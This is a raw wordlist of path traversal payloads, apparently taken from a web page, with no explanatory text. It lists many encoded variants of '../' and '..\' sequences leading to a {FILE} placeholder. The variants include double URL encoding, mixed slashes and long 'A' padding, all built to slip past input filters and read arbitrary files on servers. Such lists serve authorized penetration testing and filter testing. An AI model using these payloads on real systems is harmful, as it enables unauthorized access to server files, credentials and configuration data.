%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
